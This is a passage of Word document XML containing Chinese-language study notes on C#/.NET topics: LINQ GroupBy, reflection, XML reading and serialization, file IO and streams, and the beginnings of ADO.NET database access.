        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>上面四个方法的第一个委托参数TSource表示数据源，返回值为排序的关键字名称TKey</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>GroupBy()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>GroupBy&lt;TSource, TKey&gt;(this IEnumerable&lt;TSource&gt; source, Func&lt;TSource, TKey&gt; keySelector);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>第一个委托参数TSource表示数据源，返回值表示分组的关键字名称。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>它的返回值是IGrouping对象，它定义了Key属性用于访问分组的关键字，还有分组后的TSource对象也可以访问的到.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>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反射</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>反射拼接SQL语句、反射转换Json/Datatable...、序列化反序列化（ISerializable）、反射动态调用dll、反射动态配置扩展</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>序列化是把一个对象持久化到磁盘中的过程。另一个应用程序可以反序列化对象，使它的状态与序列化之前一样。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>XML数据格式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>我们可以使用XMLDocument类在文档对象模型(DOM)层次结构内导航</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>也可以使用XMLReader和XMLWriter。使用XML更复杂，但可以读取更大的文件。使用XMLDocument把文档全部加载进了内存中，使用XMLReader可以逐个节点读取。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>另一个使用XML的方式是System.Xml.Serialization，把.NET对象序列化为XML，也可以把XML反序列化为.NET对象。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>查询XML内容时，可以使用XML标准XPath或Linq to Xml。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>对于WCF，XML可以压缩为二进制格式。JSON也可以压缩为二进制格式(BSON) .</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>我们可以使用WSDL描述XML数据，使用Swagger描述JSON数据。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>XmlReader，XMLDocument和XPathNavigator类</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>XmlReader和XmlWriter类提供了读写大型XML文档的快速方式。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>常见的遍历文档的方法有Read()方法进入下一个节点。然后验证该节点是否有值(HasValue())，或者该节点是否有特性(HasAttributes())，XmlReader还可以读取强类型的数据，它有几个方法如：ReadElementContentAsDouble()，ReadElementContentAsString()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>XmlDocument类用于在.NET中读写DOM类。与XmlReader和XmlWriter不同的是XmlDocument具有读写的功能，并可以随机访问DOM树。常见的遍历方法有GetElementByTagName()获取指定元素的列表，然后调用子集的OuterXml,InnerXml,NextSibling,PreviousSibling等属性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>XPathNavigator也可以读写XML文档，特点是可以通过XPath语句访问到指定元素。要注意的是，只用通过XMLDocument创建的对象才可以修改文件，通过XMLPathDocument创建的对象是只读的。。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>XML序列化</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.NET Framework为序列化提供了两个名称空间：System.Xml.Serialization和System.Xml.XmlSerializer。它包含的类可用于把对象序列化为Xml文档或者流。这也就表示把对象的公共属性和字段转换为Xml元素或属性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>我们可以在POCO的属性上添加XmlElement元素，来定义输出XML的名称，命名空间，类型等。如：ElementName设置XML元素的名称，Namespace设置命名空间的名称，Order设置顺序</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>XmlAttribute可以将POCO的属性设置为XML的属性，并且可以设置XML属性的名称，命名空间等。</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常用类</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>IO类、Json.NET、Http辅助类（HttpClient、Restsharp、WebClient、WebRequest）、爬虫类、文件压缩类、条形码 、金额、时间、Assembly等类的实现</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>IO类</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>File，FileInfo类可以读取，写入，创建，删除，移动文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在C# 4.0之前ReadAllLines()方法用于读取文件中所有的行，并以数组的形式返回，但是它有一个问题，就是它要等所有的行写入内存之后才能读取第一行内容。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ReadLines()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法解决了这个问题，它返回IEnumerable&lt;string&gt;而不是string数组，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>这个新增的方法要高效很多，它不是将所有行一次性加载进内存中，而是每次读取一行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果要打开一个很大的文件，之前的方法要等整个文件都加入内存中，才能访问第一行。而这个新方法每次只读取一行，更加高效。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Path类可以读取文件或目录的信息如：扩展名，文件，文件夹名，返回随机文件，创建临时文件等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>流是一个用于传输数据的对象，数据可以向两个方向传输：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>外部源 --&gt; 程序 (读取流)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序 --&gt;  外部源 (写入流)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>外部源可能是一些网络协议(接口)，命名管道，内存区域</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们可以使用System.IO,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>MemoryStream</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>读写内存</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>System.Net.Sockets.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>NetworkStream</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象处理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>网络数据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Stream类对外部数据源不做任何假定，外部数据源可以是文件流，内存流，网络流或任意数据源。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一些流可以链接调用(chain)，可以先使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>DeflateStream压缩数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，然后写入到FileStream,MemoryStream或NetworkStream中。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接读写流不是那么容易，但是可以使用阅读器和写入器，流入StringReader和StringWriter类。这是一个关注点分离。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>FileStream</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>读写文本文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，需要使用字节数组。有更简单的方法：使用读取器(StreamReader)和写入器(StreamWriter)，使用它们无需处理字节数组和编码，比较轻松。</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数据层</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>原生的ADO.NET</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>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用于连接和管理针对数据库的事务。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>为了访问数据库，需要提供某些连接参数，如运行数据库的计算机和登记证书。使用SqlConnection类来连接SQLServer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>我们可以在https://www.connectionstrings.com/上找到各个数据库的连接字符串。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>连接池</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdan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pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>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用于发出针对数据库的SQL指令。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>创建命令：conn.CreateCommand()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
